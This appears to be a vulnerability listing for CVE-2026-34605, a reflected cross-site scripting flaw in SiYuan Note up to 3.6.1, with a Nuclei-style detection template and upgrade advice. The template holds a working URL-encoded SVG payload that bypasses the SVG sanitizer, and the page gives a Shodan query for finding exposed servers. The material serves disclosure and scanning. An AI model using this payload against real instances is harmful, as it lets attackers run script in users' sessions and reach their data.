SiYuan Note - Cross-Site Scripting
CVE-2026-34605
Verified
Description
SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements with a namespace prefix (such as `<x:script>`). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim’s browser upon visiting a crafted link.
Severity
Medium
CVSS Score
6.1
Exploit Probability
0%
Affected Product
siyuan
Published Date
March 31, 2026
Template Author
ritikchaddha
CVE-2026-34605.yaml
id: CVE-2026-34605
info:
name: SiYuan Note - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements with a namespace prefix (such as `<x:script>`). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim’s browser upon visiting a crafted link.
remediation: |
Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.
impact: |
Exploitation allows attackers to execute JavaScript in the context of the SiYuan Note instance, enabling unauthorized access to sensitive data, API calls with the victim's privileges, and potential data extraction or modification, if the victim is an authenticated user.
reference:
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-73g7-86qr-jrg3
- https://nvd.nist.gov/vuln/detail/CVE-2026-34605
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2026-34605
epss-score: 0.00469
epss-percentile: 0.37283
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: siyuan-note
product: siyuan
shodan-query: http.favicon.hash:-1450125239
tags: cve,cve2026,siyuan,xss,svg
http:
- method: GET
path:
- "{{BaseURL}}/api/icon/getDynamicIcon?type=8&color=red&content=%3C%2Ftext%3E%3Cx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E%3Ctext%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</text><x:script xmlns:x="http://www.w3.org/2000/svg">alert(document.domain)</x:script><text>'
- 'id="dynamic_icon_type8'
condition: and
- type: word
part: content_type
words:
- "image/svg+xml"
- type: status
status:
- 200
# digest: 4b0a00483046022100dcb78d8973c9bcb347311c20837ad5f17fa21eee5c9a12e04731ca2dfdebe768022100ec04e70fff6603c64ff6000fac55ddb3ff31d020cd0303f81cb7ca20fda553bc:922c64590222798bb761d5b6d8e729506.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-34605
CWE ID:
cwe-79
Remediation Steps
Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.